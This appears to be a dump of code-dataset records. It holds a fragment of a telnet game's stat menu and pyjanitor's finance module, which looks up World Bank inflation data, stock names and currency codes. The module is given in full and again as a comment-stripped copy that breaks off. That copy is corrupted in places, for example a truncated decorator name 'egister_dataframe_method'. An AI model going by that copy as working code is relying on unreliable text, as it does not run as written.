####################################################################
def print_stats(self, clear_screen=True):
message = []
if clear_screen:
message.append("<clearscreen>")
message += ["<white><bold>"]
message.append("---------------------- Your Stats ----------------------\r\n")
message.append("<dim>")
message.append("Player: %s\r\n" % self.player.name)
message.append("Stat Points Left: %s\r\n" % self.player.stat_points)
message.append("1) Strength: %s\r\n" % self.player.attributes.STRENGTH)
message.append("2) Health: %s\r\n" % self.player.attributes.HEALTH)
message.append("3) Agility: %s\r\n" % self.player.attributes.AGILITY)
message.append("<bold>")
message.append("--------------------------------------------------------\r\n")
message.append("Enter 1, 2, or 3 to add a stat point, or \"quit\" to go back: ")
self.send("".join(message))
| 43.527027
| 102
| 0.473455
|
import logging
import player
import telnet
logger = logging.getLogger(__name__)
| true
| true
|
790b0d93c0d982713add4a368d7b247ccff99111
| 21,921
|
py
|
Python
|
janitor/finance.py
|
thatlittleboy/pyjanitor
|
f7977e00d3d9bf49aebeaa62db2965a668c50c90
|
[
"MIT"
] | null | null | null |
janitor/finance.py
|
thatlittleboy/pyjanitor
|
f7977e00d3d9bf49aebeaa62db2965a668c50c90
|
[
"MIT"
] | null | null | null |
janitor/finance.py
|
thatlittleboy/pyjanitor
|
f7977e00d3d9bf49aebeaa62db2965a668c50c90
|
[
"MIT"
] | null | null | null |
"""
Finance-specific data cleaning functions.
"""
import json
from datetime import date
from functools import lru_cache
import pandas as pd
import pandas_flavor as pf
import requests
from janitor.errors import JanitorError
from .utils import check, deprecated_alias, is_connected
currency_set = {
"AUD",
"BGN",
"BRL",
"CAD",
"CHF",
"CNY",
"CZK",
"DKK",
"EUR",
"GBP",
"HKD",
"HRK",
"HUF",
"IDR",
"ILS",
"INR",
"ISK",
"JPY",
"KRW",
"MXN",
"MYR",
"NOK",
"NZD",
"PHP",
"PLN",
"RON",
"RUB",
"SEK",
"SGD",
"THB",
"TRY",
"USD",
"ZAR",
}
# Dictionary of recognized World Bank countries and their abbreviations
wb_country_dict = {
"Aruba": "ABW",
"Afghanistan": "AFG",
"Angola": "AGO",
"Albania": "ALB",
"Andorra": "AND",
"Arab World": "ARB",
"United Arab Emirates": "ARE",
"Argentina": "ARG",
"Armenia": "ARM",
"American Samoa": "ASM",
"Antigua and Barbuda": "ATG",
"Australia": "AUS",
"Austria": "AUT",
"Azerbaijan": "AZE",
"Burundi": "BDI",
"Belgium": "BEL",
"Benin": "BEN",
"Burkina Faso": "BFA",
"Bangladesh": "BGD",
"Bulgaria": "BGR",
"Bahrain": "BHR",
"Bahamas, The": "BHS",
"Bosnia and Herzegovina": "BIH",
"Belarus": "BLR",
"Belize": "BLZ",
"Bermuda": "BMU",
"Bolivia": "BOL",
"Brazil": "BRA",
"Barbados": "BRB",
"Brunei Darussalam": "BRN",
"Bhutan": "BTN",
"Botswana": "BWA",
"Central African Republic": "CAF",
"Canada": "CAN",
"Central Europe and the Baltics": "CEB",
"Switzerland": "CHE",
"Channel Islands": "CHI",
"Chile": "CHL",
"China": "CHN",
"Cote d'Ivoire": "CIV",
"Cameroon": "CMR",
"Congo, Dem. Rep.": "COD",
"Congo, Rep.": "COG",
"Colombia": "COL",
"Comoros": "COM",
"Cabo Verde": "CPV",
"Costa Rica": "CRI",
"Caribbean small states": "CSS",
"Cuba": "CUB",
"Curacao": "CUW",
"Cayman Islands": "CYM",
"Cyprus": "CYP",
"Czech Republic": "CZE",
"Germany": "DEU",
"Djibouti": "DJI",
"Dominica": "DMA",
"Denmark": "DNK",
"Dominican Republic": "DOM",
"Algeria": "DZA",
"East Asia & Pacific (excluding high income)": "EAP",
"Early-demographic dividend": "EAR",
"East Asia & Pacific": "EAS",
"Europe & Central Asia (excluding high income)": "ECA",
"Europe & Central Asia": "ECS",
"Ecuador": "ECU",
"Egypt, Arab Rep.": "EGY",
"Euro area": "EMU",
"Eritrea": "ERI",
"Spain": "ESP",
"Estonia": "EST",
"Ethiopia": "ETH",
"European Union": "EUU",
"Fragile and conflict affected situations": "FCS",
"Finland": "FIN",
"Fiji": "FJI",
"France": "FRA",
"Faroe Islands": "FRO",
"Micronesia, Fed. Sts.": "FSM",
"Gabon": "GAB",
"United Kingdom": "GBR",
"Georgia": "GEO",
"Ghana": "GHA",
"Gibraltar": "GIB",
"Guinea": "GIN",
"Gambia, The": "GMB",
"Guinea-Bissau": "GNB",
"Equatorial Guinea": "GNQ",
"Greece": "GRC",
"Grenada": "GRD",
"Greenland": "GRL",
"Guatemala": "GTM",
"Guam": "GUM",
"Guyana": "GUY",
"High income": "HIC",
"Hong Kong SAR, China": "HKG",
"Honduras": "HND",
"Heavily indebted poor countries (HIPC)": "HPC",
"Croatia": "HRV",
"Haiti": "HTI",
"Hungary": "HUN",
"IBRD only": "IBD",
"IDA & IBRD total": "IBT",
"IDA total": "IDA",
"IDA blend": "IDB",
"Indonesia": "IDN",
"IDA only": "IDX",
"Isle of Man": "IMN",
"India": "IND",
"Not classified": "INX",
"Ireland": "IRL",
"Iran, Islamic Rep.": "IRN",
"Iraq": "IRQ",
"Iceland": "ISL",
"Israel": "ISR",
"Italy": "ITA",
"Jamaica": "JAM",
"Jordan": "JOR",
"Japan": "JPN",
"Kazakhstan": "KAZ",
"Kenya": "KEN",
"Kyrgyz Republic": "KGZ",
"Cambodia": "KHM",
"Kiribati": "KIR",
"St. Kitts and Nevis": "KNA",
"Korea, Rep.": "KOR",
"Kuwait": "KWT",
"Latin America & Caribbean (excluding high income)": "LAC",
"Lao PDR": "LAO",
"Lebanon": "LBN",
"Liberia": "LBR",
"Libya": "LBY",
"St. Lucia": "LCA",
"Latin America & Caribbean": "LCN",
"Least developed countries: UN classification": "LDC",
"Low income": "LIC",
"Liechtenstein": "LIE",
"Sri Lanka": "LKA",
"Lower middle income": "LMC",
"Low & middle income": "LMY",
"Lesotho": "LSO",
"Late-demographic dividend": "LTE",
"Lithuania": "LTU",
"Luxembourg": "LUX",
"Latvia": "LVA",
"Macao SAR, China": "MAC",
"St. Martin (French part)": "MAF",
"Morocco": "MAR",
"Monaco": "MCO",
"Moldova": "MDA",
"Madagascar": "MDG",
"Maldives": "MDV",
"Middle East & North Africa": "MEA",
"Mexico": "MEX",
"Marshall Islands": "MHL",
"Middle income": "MIC",
"North Macedonia": "MKD",
"Mali": "MLI",
"Malta": "MLT",
"Myanmar": "MMR",
"Middle East & North Africa (excluding high income)": "MNA",
"Montenegro": "MNE",
"Mongolia": "MNG",
"Northern Mariana Islands": "MNP",
"Mozambique": "MOZ",
"Mauritania": "MRT",
"Mauritius": "MUS",
"Malawi": "MWI",
"Malaysia": "MYS",
"North America": "NAC",
"Namibia": "NAM",
"New Caledonia": "NCL",
"Niger": "NER",
"Nigeria": "NGA",
"Nicaragua": "NIC",
"Netherlands": "NLD",
"Norway": "NOR",
"Nepal": "NPL",
"Nauru": "NRU",
"New Zealand": "NZL",
"OECD members": "OED",
"Oman": "OMN",
"Other small states": "OSS",
"Pakistan": "PAK",
"Panama": "PAN",
"Peru": "PER",
"Philippines": "PHL",
"Palau": "PLW",
"Papua New Guinea": "PNG",
"Poland": "POL",
"Pre-demographic dividend": "PRE",
"Puerto Rico": "PRI",
"Korea, Dem. People's Rep.": "PRK",
"Portugal": "PRT",
"Paraguay": "PRY",
"West Bank and Gaza": "PSE",
"Pacific island small states": "PSS",
"Post-demographic dividend": "PST",
"French Polynesia": "PYF",
"Qatar": "QAT",
"Romania": "ROU",
"Russian Federation": "RUS",
"Rwanda": "RWA",
"South Asia": "SAS",
"Saudi Arabia": "SAU",
"Sudan": "SDN",
"Senegal": "SEN",
"Singapore": "SGP",
"Solomon Islands": "SLB",
"Sierra Leone": "SLE",
"El Salvador": "SLV",
"San Marino": "SMR",
"Somalia": "SOM",
"Serbia": "SRB",
"Sub-Saharan Africa (excluding high income)": "SSA",
"South Sudan": "SSD",
"Sub-Saharan Africa": "SSF",
"Small states": "SST",
"Sao Tome and Principe": "STP",
"Suriname": "SUR",
"Slovak Republic": "SVK",
"Slovenia": "SVN",
"Sweden": "SWE",
"Eswatini": "SWZ",
"Sint Maarten (Dutch part)": "SXM",
"Seychelles": "SYC",
"Syrian Arab Republic": "SYR",
"Turks and Caicos Islands": "TCA",
"Chad": "TCD",
"East Asia & Pacific (IDA & IBRD countries)": "TEA",
"Europe & Central Asia (IDA & IBRD countries)": "TEC",
"Togo": "TGO",
"Thailand": "THA",
"Tajikistan": "TJK",
"Turkmenistan": "TKM",
"Latin America & the Caribbean (IDA & IBRD countries)": "TLA",
"Timor-Leste": "TLS",
"Middle East & North Africa (IDA & IBRD countries)": "TMN",
"Tonga": "TON",
"South Asia (IDA & IBRD)": "TSA",
"Sub-Saharan Africa (IDA & IBRD countries)": "TSS",
"Trinidad and Tobago": "TTO",
"Tunisia": "TUN",
"Turkey": "TUR",
"Tuvalu": "TUV",
"Tanzania": "TZA",
"Uganda": "UGA",
"Ukraine": "UKR",
"Upper middle income": "UMC",
"Uruguay": "URY",
"United States": "USA",
"Uzbekistan": "UZB",
"St. Vincent and the Grenadines": "VCT",
"Venezuela, RB": "VEN",
"British Virgin Islands": "VGB",
"Virgin Islands (U.S.)": "VIR",
"Vietnam": "VNM",
"Vanuatu": "VUT",
"World": "WLD",
"Samoa": "WSM",
"Kosovo": "XKX",
"Yemen, Rep.": "YEM",
"South Africa": "ZAF",
"Zambia": "ZMB",
"Zimbabwe": "ZWE",
}
def _check_currency(currency: str):
"""Check that currency is in supported set."""
if currency not in currency_set:
raise ValueError(
f"currency {currency} not in supported currency set, "
f"{currency_set}"
)
def _check_wb_country(country: str):
"""Check that world bank country is in supported set."""
if (country not in wb_country_dict.keys()) & (
country not in wb_country_dict.values() # noqa: PD011
):
raise ValueError(
f"country {country} not in supported World Bank country dict, "
f"{wb_country_dict}"
)
def _check_wb_years(year: int):
"""Check that year is in world bank dataset years."""
if year < 1960:
raise ValueError("year value must be 1960 or later")
# @lru_cache(maxsize=32)
# def _convert_currency(
# api_key: str,
# from_currency: str = None,
# to_currency: str = None,
# historical_date: Optional[date] = None,
# ) -> float:
# """
# Currency conversion for Pandas DataFrame column.
# Helper function for `convert_currency` method.
# The API used is https://exchangeratesapi.io/.
# """
# url = "http://api.exchangeratesapi.io"
# if historical_date:
# check("historical_date", historical_date, [datetime, date])
# if isinstance(historical_date, datetime):
# if historical_date < datetime(1999, 1, 4):
# raise ValueError(
# "historical_date:datetime must be later than 1999-01-04!"
# )
# string_date = str(historical_date)[:10]
# else:
# if historical_date < date(1999, 1, 4):
# raise ValueError(
# "historical_date:date must be later than 1999-01-04!"
# )
# string_date = str(historical_date)
# url = url + "/%s" % string_date
# else:
# url = url + "/latest"
# _check_currency(from_currency)
# _check_currency(to_currency)
# payload = {
# # "base": from_currency,
# "symbols": to_currency,
# "access_key": api_key,
# }
# result = requests.get(url, params=payload)
# if result.status_code != 200:
# raise ConnectionError(
# "Exchange Rate API failed to receive a 200 "
# "response from the server. "
# "Please try again later."
# )
# currency_dict = json.loads(result.text)
# rate = currency_dict["rates"][to_currency]
# return rate
@pf.register_dataframe_method
@deprecated_alias(colname="column_name")
def convert_currency(
df: pd.DataFrame,
api_key: str,
column_name: str = None,
from_currency: str = None,
to_currency: str = None,
historical_date: date = None,
make_new_column: bool = False,
) -> pd.DataFrame:
"""Deprecated function."""
raise JanitorError(
"The `convert_currency` function has been temporarily disabled due to "
"exchangeratesapi.io disallowing free pinging of its API. "
"(Our tests started to fail due to this issue.) "
"There is no easy way around this problem "
"except to find a new API to call on."
"Please comment on issue #829 "
"(https://github.com/pyjanitor-devs/pyjanitor/issues/829) "
"if you know of an alternative API that we can call on, "
"otherwise the function will be removed in pyjanitor's 1.0 release."
)
# @pf.register_dataframe_method
# @deprecated_alias(colname="column_name")
# def convert_currency(
# df: pd.DataFrame,
# api_key: str,
# column_name: str = None,
# from_currency: str = None,
# to_currency: str = None,
# historical_date: date = None,
# make_new_column: bool = False,
# ) -> pd.DataFrame:
# """
# Converts a column from one currency to another, with an option to
# convert based on historical exchange values.
# On April 10 2021,
# we discovered that there was no more free API available.
# Thus, an API key is required to perform currency conversion.
# API keys should be set as an environment variable,
# for example, `EXCHANGE_RATE_API_KEY``,
# and then passed into the function
# by calling on `os.getenv("EXCHANGE_RATE_APIKEY")``.
# :param df: A pandas dataframe.
# :param api_key: exchangeratesapi.io API key.
# :param column_name: Name of the new column. Should be a string, in order
# for the column name to be compatible with the Feather binary
# format (this is a useful thing to have).
# :param from_currency: The base currency to convert from.
# May be any of: currency_set = {"AUD", "BGN", "BRL", "CAD", "CHF",
# "CNY", "CZK", "DKK", "EUR", "GBP", "HKD", "HRK", "HUF", "IDR",
# "ILS", "INR", "ISK", "JPY", "KRW", "MXN", "MYR", "NOK", "NZD",
# "PHP", "PLN", "RON", "RUB", "SEK", "SGD", "THB", "TRY", "USD",
# "ZAR"}
# :param to_currency: The target currency to convert to.
# May be any of: currency_set = {"AUD", "BGN", "BRL", "CAD", "CHF",
# "CNY", "CZK", "DKK", "EUR", "GBP", "HKD", "HRK", "HUF", "IDR",
# "ILS", "INR", "ISK", "JPY", "KRW", "MXN", "MYR", "NOK", "NZD",
# "PHP", "PLN", "RON", "RUB", "SEK", "SGD", "THB", "TRY", "USD",
# "ZAR"}
# :param historical_date: If supplied,
# get exchange rate on a certain date.
# If not supplied, get the latest exchange rate.
# The exchange rates go back to Jan. 4, 1999.
# :param make_new_column: Generates new column
# for converted currency if True,
# otherwise, converts currency in place.
# :returns: The dataframe with converted currency column.
# .. code-block:: python
# import pandas as pd
# import janitor
# from datetime import date
# data_dict = {
# "a": [1.23452345, 2.456234, 3.2346125] * 3,
# "Bell__Chart": [1/3, 2/7, 3/2] * 3,
# "decorated-elephant": [1/234, 2/13, 3/167] * 3,
# "animals": ["rabbit", "leopard", "lion"] * 3,
# "cities": ["Cambridge", "Shanghai", "Basel"] * 3,
# }
# example_dataframe = pd.DataFrame(data_dict)
# Example: Converting a column from one currency to another
# using rates from 01/01/2018.
# .. code-block:: python
# example_dataframe.convert_currency('a', from_currency='USD',
# to_currency='EUR', historical_date=date(2018,1,1))
# Output:
# .. code-block:: python
# a Bell__Chart decorated-elephant animals cities
# 0 1.029370 0.333333 0.004274 rabbit Cambridge
# 1 2.048056 0.285714 0.153846 leopard Shanghai
# 2 2.697084 1.500000 0.017964 lion Basel
# 3 1.029370 0.333333 0.004274 rabbit Cambridge
# 4 2.048056 0.285714 0.153846 leopard Shanghai
# 5 2.697084 1.500000 0.017964 lion Basel
# 6 1.029370 0.333333 0.004274 rabbit Cambridge
# 7 2.048056 0.285714 0.153846 leopard Shanghai
# 8 2.697084 1.500000 0.017964 lion Basel
# """
# rate = _convert_currency(
# api_key, from_currency, to_currency, historical_date
# )
# if make_new_column:
# # new_column_name = column_name + "_" + to_currency
# column_name = column_name + "_" + to_currency
# df = df.assign(column_name=df[column_name] * rate)
# return df
@lru_cache(maxsize=32)
def _inflate_currency(
country: str = None, currency_year: int = None, to_year: int = None
) -> float:
"""
Currency inflation for Pandas DataFrame column.
Helper function for `inflate_currency` method.
The API used is the World Bank Indicator API:
https://datahelpdesk.worldbank.org/knowledgebase/articles/889392-about-the-indicators-api-documentation
"""
# Check all inputs are correct data type
check("country", country, [str])
check("currency_year", currency_year, [int])
check("to_year", to_year, [int])
# Get WB country abbreviation
_check_wb_country(country)
if country in wb_country_dict.keys():
country = wb_country_dict[country]
else:
# `country` is already a correct abbreviation; do nothing
pass
_check_wb_years(currency_year)
_check_wb_years(to_year)
url = (
"https://api.worldbank.org/v2/country/"
+ country
+ "/indicator/FP.CPI.TOTL?date="
+ str(min(currency_year, to_year))
+ ":"
+ str(max(currency_year, to_year))
+ "&format=json"
)
result = requests.get(url)
if result.status_code != 200:
raise ConnectionError(
"WB Indicator API failed to receive a 200 "
"response from the server. "
"Please try again later."
)
# The API returns a list of two items;
# the second item in the list is what we want
inflation_dict = json.loads(result.text)[1]
# Error checking
if inflation_dict is None:
raise ValueError(
"The WB Indicator API returned nothing. "
"This likely means the currency_year and "
"to_year are outside of the year range for "
"which the WB has inflation data for the "
"specified country."
)
# Create new dict with only the year and inflation values
inflation_dict_ready = {
int(inflation_dict[i]["date"]): float(inflation_dict[i]["value"])
for i in range(len(inflation_dict))
if inflation_dict[i]["value"] is not None
}
# Error catching
if currency_year not in inflation_dict_ready.keys():
raise ValueError(
f"The WB Indicator API does not have inflation "
f"data for {currency_year} for {country}."
)
if to_year not in inflation_dict_ready.keys():
raise ValueError(
f"The WB Indicator API does not have inflation "
f"data for {to_year} for {country}."
)
inflator = (
inflation_dict_ready[to_year] / inflation_dict_ready[currency_year]
)
return inflator
@pf.register_dataframe_method
def inflate_currency(
df: pd.DataFrame,
column_name: str = None,
country: str = None,
currency_year: int = None,
to_year: int = None,
make_new_column: bool = False,
) -> pd.DataFrame:
"""
Inflates a column of monetary values from one year to another, based on
the currency's country.
The provided country can be any economy name or code from the World Bank
[list of economies]
(https://databank.worldbank.org/data/download/site-content/CLASS.xls).
**Note**: This method mutates the original DataFrame.
Method chaining usage example:
>>> import pandas as pd
>>> import janitor.finance
>>> df = pd.DataFrame({"profit":[100.10, 200.20, 300.30, 400.40, 500.50]})
>>> df
profit
0 100.1
1 200.2
2 300.3
3 400.4
4 500.5
>>> df.inflate_currency(
... column_name='profit',
... country='USA',
... currency_year=2015,
... to_year=2018,
... make_new_column=True
... )
profit profit_2018
0 100.1 106.050596
1 200.2 212.101191
2 300.3 318.151787
3 400.4 424.202382
4 500.5 530.252978
:param df: A pandas DataFrame.
:param column_name: Name of the column containing monetary
values to inflate.
:param country: The country associated with the currency being inflated.
May be any economy or code from the World Bank [List of economies]
(https://databank.worldbank.org/data/download/site-content/CLASS.xls).
:param currency_year: The currency year to inflate from.
The year should be 1960 or later.
:param to_year: The currency year to inflate to.
The year should be 1960 or later.
:param make_new_column: Generates new column for inflated currency if
True, otherwise, inflates currency in place.
:returns: The dataframe with inflated currency column.
"""
inflator = _inflate_currency(country, currency_year, to_year)
if make_new_column:
new_column_name = column_name + "_" + str(to_year)
df[new_column_name] = df[column_name] * inflator
else:
df[column_name] = df[column_name] * inflator
return df
def convert_stock(stock_symbol: str) -> str:
"""
This function takes in a stock symbol as a parameter,
queries an API for the companies full name and returns
it
Functional usage example:
```python
import janitor.finance
janitor.finance.convert_stock("aapl")
```
:param stock_symbol: Stock ticker Symbol
:raises ConnectionError: Internet connection is not available
:returns: Full company name
"""
if is_connected("www.google.com"):
stock_symbol = stock_symbol.upper()
return get_symbol(stock_symbol)
else:
raise ConnectionError(
"Connection Error: Client Not Connected to Internet"
)
def get_symbol(symbol: str):
"""
This is a helper function to get a companies full
name based on the stock symbol.
Functional usage example:
```python
import janitor.finance
janitor.finance.get_symbol("aapl")
```
:param symbol: This is our stock symbol that we use
to query the api for the companies full name.
:return: Company full name
"""
result = requests.get(
"http://d.yimg.com/autoc."
+ "finance.yahoo.com/autoc?query={}®ion=1&lang=en".format(symbol)
).json()
for x in result["ResultSet"]["Result"]:
if x["symbol"] == symbol:
return x["name"]
else:
return None
| 29.384718
| 107
| 0.57356
|
import json
from datetime import date
from functools import lru_cache
import pandas as pd
import pandas_flavor as pf
import requests
from janitor.errors import JanitorError
from .utils import check, deprecated_alias, is_connected
currency_set = {
"AUD",
"BGN",
"BRL",
"CAD",
"CHF",
"CNY",
"CZK",
"DKK",
"EUR",
"GBP",
"HKD",
"HRK",
"HUF",
"IDR",
"ILS",
"INR",
"ISK",
"JPY",
"KRW",
"MXN",
"MYR",
"NOK",
"NZD",
"PHP",
"PLN",
"RON",
"RUB",
"SEK",
"SGD",
"THB",
"TRY",
"USD",
"ZAR",
}
wb_country_dict = {
"Aruba": "ABW",
"Afghanistan": "AFG",
"Angola": "AGO",
"Albania": "ALB",
"Andorra": "AND",
"Arab World": "ARB",
"United Arab Emirates": "ARE",
"Argentina": "ARG",
"Armenia": "ARM",
"American Samoa": "ASM",
"Antigua and Barbuda": "ATG",
"Australia": "AUS",
"Austria": "AUT",
"Azerbaijan": "AZE",
"Burundi": "BDI",
"Belgium": "BEL",
"Benin": "BEN",
"Burkina Faso": "BFA",
"Bangladesh": "BGD",
"Bulgaria": "BGR",
"Bahrain": "BHR",
"Bahamas, The": "BHS",
"Bosnia and Herzegovina": "BIH",
"Belarus": "BLR",
"Belize": "BLZ",
"Bermuda": "BMU",
"Bolivia": "BOL",
"Brazil": "BRA",
"Barbados": "BRB",
"Brunei Darussalam": "BRN",
"Bhutan": "BTN",
"Botswana": "BWA",
"Central African Republic": "CAF",
"Canada": "CAN",
"Central Europe and the Baltics": "CEB",
"Switzerland": "CHE",
"Channel Islands": "CHI",
"Chile": "CHL",
"China": "CHN",
"Cote d'Ivoire": "CIV",
"Cameroon": "CMR",
"Congo, Dem. Rep.": "COD",
"Congo, Rep.": "COG",
"Colombia": "COL",
"Comoros": "COM",
"Cabo Verde": "CPV",
"Costa Rica": "CRI",
"Caribbean small states": "CSS",
"Cuba": "CUB",
"Curacao": "CUW",
"Cayman Islands": "CYM",
"Cyprus": "CYP",
"Czech Republic": "CZE",
"Germany": "DEU",
"Djibouti": "DJI",
"Dominica": "DMA",
"Denmark": "DNK",
"Dominican Republic": "DOM",
"Algeria": "DZA",
"East Asia & Pacific (excluding high income)": "EAP",
"Early-demographic dividend": "EAR",
"East Asia & Pacific": "EAS",
"Europe & Central Asia (excluding high income)": "ECA",
"Europe & Central Asia": "ECS",
"Ecuador": "ECU",
"Egypt, Arab Rep.": "EGY",
"Euro area": "EMU",
"Eritrea": "ERI",
"Spain": "ESP",
"Estonia": "EST",
"Ethiopia": "ETH",
"European Union": "EUU",
"Fragile and conflict affected situations": "FCS",
"Finland": "FIN",
"Fiji": "FJI",
"France": "FRA",
"Faroe Islands": "FRO",
"Micronesia, Fed. Sts.": "FSM",
"Gabon": "GAB",
"United Kingdom": "GBR",
"Georgia": "GEO",
"Ghana": "GHA",
"Gibraltar": "GIB",
"Guinea": "GIN",
"Gambia, The": "GMB",
"Guinea-Bissau": "GNB",
"Equatorial Guinea": "GNQ",
"Greece": "GRC",
"Grenada": "GRD",
"Greenland": "GRL",
"Guatemala": "GTM",
"Guam": "GUM",
"Guyana": "GUY",
"High income": "HIC",
"Hong Kong SAR, China": "HKG",
"Honduras": "HND",
"Heavily indebted poor countries (HIPC)": "HPC",
"Croatia": "HRV",
"Haiti": "HTI",
"Hungary": "HUN",
"IBRD only": "IBD",
"IDA & IBRD total": "IBT",
"IDA total": "IDA",
"IDA blend": "IDB",
"Indonesia": "IDN",
"IDA only": "IDX",
"Isle of Man": "IMN",
"India": "IND",
"Not classified": "INX",
"Ireland": "IRL",
"Iran, Islamic Rep.": "IRN",
"Iraq": "IRQ",
"Iceland": "ISL",
"Israel": "ISR",
"Italy": "ITA",
"Jamaica": "JAM",
"Jordan": "JOR",
"Japan": "JPN",
"Kazakhstan": "KAZ",
"Kenya": "KEN",
"Kyrgyz Republic": "KGZ",
"Cambodia": "KHM",
"Kiribati": "KIR",
"St. Kitts and Nevis": "KNA",
"Korea, Rep.": "KOR",
"Kuwait": "KWT",
"Latin America & Caribbean (excluding high income)": "LAC",
"Lao PDR": "LAO",
"Lebanon": "LBN",
"Liberia": "LBR",
"Libya": "LBY",
"St. Lucia": "LCA",
"Latin America & Caribbean": "LCN",
"Least developed countries: UN classification": "LDC",
"Low income": "LIC",
"Liechtenstein": "LIE",
"Sri Lanka": "LKA",
"Lower middle income": "LMC",
"Low & middle income": "LMY",
"Lesotho": "LSO",
"Late-demographic dividend": "LTE",
"Lithuania": "LTU",
"Luxembourg": "LUX",
"Latvia": "LVA",
"Macao SAR, China": "MAC",
"St. Martin (French part)": "MAF",
"Morocco": "MAR",
"Monaco": "MCO",
"Moldova": "MDA",
"Madagascar": "MDG",
"Maldives": "MDV",
"Middle East & North Africa": "MEA",
"Mexico": "MEX",
"Marshall Islands": "MHL",
"Middle income": "MIC",
"North Macedonia": "MKD",
"Mali": "MLI",
"Malta": "MLT",
"Myanmar": "MMR",
"Middle East & North Africa (excluding high income)": "MNA",
"Montenegro": "MNE",
"Mongolia": "MNG",
"Northern Mariana Islands": "MNP",
"Mozambique": "MOZ",
"Mauritania": "MRT",
"Mauritius": "MUS",
"Malawi": "MWI",
"Malaysia": "MYS",
"North America": "NAC",
"Namibia": "NAM",
"New Caledonia": "NCL",
"Niger": "NER",
"Nigeria": "NGA",
"Nicaragua": "NIC",
"Netherlands": "NLD",
"Norway": "NOR",
"Nepal": "NPL",
"Nauru": "NRU",
"New Zealand": "NZL",
"OECD members": "OED",
"Oman": "OMN",
"Other small states": "OSS",
"Pakistan": "PAK",
"Panama": "PAN",
"Peru": "PER",
"Philippines": "PHL",
"Palau": "PLW",
"Papua New Guinea": "PNG",
"Poland": "POL",
"Pre-demographic dividend": "PRE",
"Puerto Rico": "PRI",
"Korea, Dem. People's Rep.": "PRK",
"Portugal": "PRT",
"Paraguay": "PRY",
"West Bank and Gaza": "PSE",
"Pacific island small states": "PSS",
"Post-demographic dividend": "PST",
"French Polynesia": "PYF",
"Qatar": "QAT",
"Romania": "ROU",
"Russian Federation": "RUS",
"Rwanda": "RWA",
"South Asia": "SAS",
"Saudi Arabia": "SAU",
"Sudan": "SDN",
"Senegal": "SEN",
"Singapore": "SGP",
"Solomon Islands": "SLB",
"Sierra Leone": "SLE",
"El Salvador": "SLV",
"San Marino": "SMR",
"Somalia": "SOM",
"Serbia": "SRB",
"Sub-Saharan Africa (excluding high income)": "SSA",
"South Sudan": "SSD",
"Sub-Saharan Africa": "SSF",
"Small states": "SST",
"Sao Tome and Principe": "STP",
"Suriname": "SUR",
"Slovak Republic": "SVK",
"Slovenia": "SVN",
"Sweden": "SWE",
"Eswatini": "SWZ",
"Sint Maarten (Dutch part)": "SXM",
"Seychelles": "SYC",
"Syrian Arab Republic": "SYR",
"Turks and Caicos Islands": "TCA",
"Chad": "TCD",
"East Asia & Pacific (IDA & IBRD countries)": "TEA",
"Europe & Central Asia (IDA & IBRD countries)": "TEC",
"Togo": "TGO",
"Thailand": "THA",
"Tajikistan": "TJK",
"Turkmenistan": "TKM",
"Latin America & the Caribbean (IDA & IBRD countries)": "TLA",
"Timor-Leste": "TLS",
"Middle East & North Africa (IDA & IBRD countries)": "TMN",
"Tonga": "TON",
"South Asia (IDA & IBRD)": "TSA",
"Sub-Saharan Africa (IDA & IBRD countries)": "TSS",
"Trinidad and Tobago": "TTO",
"Tunisia": "TUN",
"Turkey": "TUR",
"Tuvalu": "TUV",
"Tanzania": "TZA",
"Uganda": "UGA",
"Ukraine": "UKR",
"Upper middle income": "UMC",
"Uruguay": "URY",
"United States": "USA",
"Uzbekistan": "UZB",
"St. Vincent and the Grenadines": "VCT",
"Venezuela, RB": "VEN",
"British Virgin Islands": "VGB",
"Virgin Islands (U.S.)": "VIR",
"Vietnam": "VNM",
"Vanuatu": "VUT",
"World": "WLD",
"Samoa": "WSM",
"Kosovo": "XKX",
"Yemen, Rep.": "YEM",
"South Africa": "ZAF",
"Zambia": "ZMB",
"Zimbabwe": "ZWE",
}
def _check_currency(currency: str):
if currency not in currency_set:
raise ValueError(
f"currency {currency} not in supported currency set, "
f"{currency_set}"
)
def _check_wb_country(country: str):
if (country not in wb_country_dict.keys()) & (
country not in wb_country_dict.values()
):
raise ValueError(
f"country {country} not in supported World Bank country dict, "
f"{wb_country_dict}"
)
def _check_wb_years(year: int):
if year < 1960:
raise ValueError("year value must be 1960 or later")
# Currency conversion for Pandas DataFrame column.
# Helper function for `convert_currency` method.
# The API used is https://exchangeratesapi.io/.
# """
egister_dataframe_method
@deprecated_alias(colname="column_name")
def convert_currency(
df: pd.DataFrame,
api_key: str,
column_name: str = None,
from_currency: str = None,
to_currency: str = None,
historical_date: date = None,
make_new_column: bool = False,
) -> pd.DataFrame:
raise JanitorError(
"The `convert_currency` function has been temporarily disabled due to "
"exchangeratesapi.io disallowing free pinging of its API. "
"(Our tests started to fail due to this issue.) "
"There is no easy way around this problem "
"except to find a new API to call on."
"Please comment on issue #829 "
"(https://github.com/pyjanitor-devs/pyjanitor/issues/829) "
"if you know of an alternative API that we can call on, "
"otherwise the function will be removed in pyjanitor's 1.0 release."
)
# @pf.register_dataframe_method
# @deprecated_alias(colname="column_name")
# def convert_currency(
# df: pd.DataFrame,
# api_key: str,
# column_name: str = None,
# from_currency: str = None,
# to_currency: str = None,
# historical_date: date = None,
# make_new_column: bool = False,
# ) -> pd.DataFrame:
# """
# Converts a column from one currency to another, with an option to
# convert based on historical exchange values.
# On April 10 2021,
# we discovered that there was no more free API available.
# Thus, an API key is required to perform currency conversion.
# API keys should be set as an environment variable,
# for example, `EXCHANGE_RATE_API_KEY``,
# and then passed into the function
# by calling on `os.getenv("EXCHANGE_RATE_APIKEY")``.
# :param df: A pandas dataframe.
# :param api_key: exchangeratesapi.io API key.
# :param column_name: Name of the new column. Should be a string, in order
# for the column name to be compatible with the Feather binary
# format (this is a useful thing to have).
# :param from_currency: The base currency to convert from.
# May be any of: currency_set = {"AUD", "BGN", "BRL", "CAD", "CHF",
# "CNY", "CZK", "DKK", "EUR", "GBP", "HKD", "HRK", "HUF", "IDR",
# "ILS", "INR", "ISK", "JPY", "KRW", "MXN", "MYR", "NOK", "NZD",
# "PHP", "PLN", "RON", "RUB", "SEK", "SGD", "THB", "TRY", "USD",
# "ZAR"}
# :param to_currency: The target currency to convert to.
# May be any of: currency_set = {"AUD", "BGN", "BRL", "CAD", "CHF",
# "CNY", "CZK", "DKK", "EUR", "GBP", "HKD", "HRK", "HUF", "IDR",
# "ILS", "INR", "ISK", "JPY", "KRW", "MXN", "MYR", "NOK", "NZD",
# "PHP", "PLN", "RON", "RUB", "SEK", "SGD", "THB", "TRY", "USD",
# "ZAR"}
# :param historical_date: If supplied,
